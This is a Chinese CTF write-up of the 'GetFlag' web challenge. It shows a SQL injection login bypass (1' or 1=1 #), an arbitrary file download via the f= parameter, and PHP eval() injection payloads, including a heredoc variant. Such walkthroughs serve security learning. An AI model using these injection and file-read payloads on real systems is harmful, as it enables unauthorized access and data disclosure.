GetFlag

作者: Yix1a | 来源:发表于2019-06-07 09:33 被阅读0次
  • 进入页面,发现一个页面,查看源代码没有注释的提示。
  • 进入登陆发现是md5前几位截取。用我的submd5.py 找出可以用的验证码
  • 在burpsuite里面用万能密码尝试登陆一次。 1‘ or 1=1 #
  • 发现成功登陆后会跳转一个页面
<script>alert("Welcome 1' or 1=1 #!");window.location.href="./action.php?action=file";

</script>substr(md5(captcha), 0, 6)=5250e1<div class="box"><b>Captcha: </b></div>
  • 先不急着进入这个页面先看看注入能达到什么成功。
  • 注入 order by 3 4 有区别。 注入到union select 1,2,3 就怎么也成功不了。看来有一些过滤。
  • 不费劲了,转去上面的跳转页面看看。
  • 发现能下载三个文件。
  • 下载后除了a.php有个 echo "Do what you want to do, web dog, flag is in the web root dir"; 提示外其他两个没用。
  • root这个坑我还是以为管理员用户的目录呢。原来是网站根目录。
  • 怎么进入根目录呢,我们观察我们下载连接的时候的url
GET /Challenges/file/download.php?f=a.php HTTP/1.1
  • f= 指定文件就行了,可能没有过滤。既然是根目录试试/var/www/html/flag.php,就返回一个200 ok 这里我又踩了个坑, 应该是/var/www/html/Challenges/flag.php
  • 得到一个php文件。
  • 看一下
<?php
$f = $_POST['flag'];
$f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
{
        die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try
{
         eval("\$spaceone = $f");
}
catch (Exception $e)
{
        return false;
}
if ($spaceone === 'flag'){
    echo file_get_contents("helloctf.php");
}

?>
  • 所以往Challenges/flag.php 用post方式传一个flag=flag;就得到flag了。
    为什么呢很奇怪。
  • 测试这个方法的可行性。

$f='flag;';
eval("\$spaceone = $f");
echo $spaceone;

$f1='flag';
eval("\$spaceone = $f1");
echo $spaceone;

$f2 = 'flag;';
\$spaceone=$f;
echo $spaceone;
  • $f会输出flag $f1会输出null $f2会报错
  • 这并不能说明什么,因为f1,f没什么本质区别。后来我用assert测试发现$f1也可行。
  • 思考assert和eval的区别--assert会执行一个字符串,而eval需要执行一个语句。即assert('phpinfo();') 加不加;都行。 而eval必须的eval('phpinfo();')才行. 所以flag后面加个;
    eval会认为其是个语句。即认为是语句的时候,\就被当成了一个转义字符。
  • 第二种解法
    flag= 以下
<<<s
flag
s;
 

四个换行是必须的。还必须换成URL编码。。。。

相关文章

  • GetFlag

    进入页面,发现一个页面,查看源代码没有注释的提示。 进入登陆发现是md5前几位截取。用我的submd5.py 找出...

  • 实验吧web-头有点大

    题目地址:http://ctf5.shiyanbar.com/sHeader/ 一道改头的题目 重发getflag...

  • [VNCFT2021]gocalc0复现

    [VNCFT2021]gocalc0复现 这道题当时出了非预期,session两次base64就能getflag,...

  • 关于一道CTF题目的逆向分析(二)

    老规矩,我们拿到一个apk依旧是先分析它的java代码 再来看一下so库 先看一下getFlag() 动态调试一波...

  • “百度杯”CTF比赛 十月场 Getflag

    先总结一下吧,第一个就是多尝试,不要怕,然后就是细节。 打开页面,显示 This is a mini file m...

网友评论

      本文标题:GetFlag

      本文链接:https://www.haomeiwen.com/subject/kgurxctx.html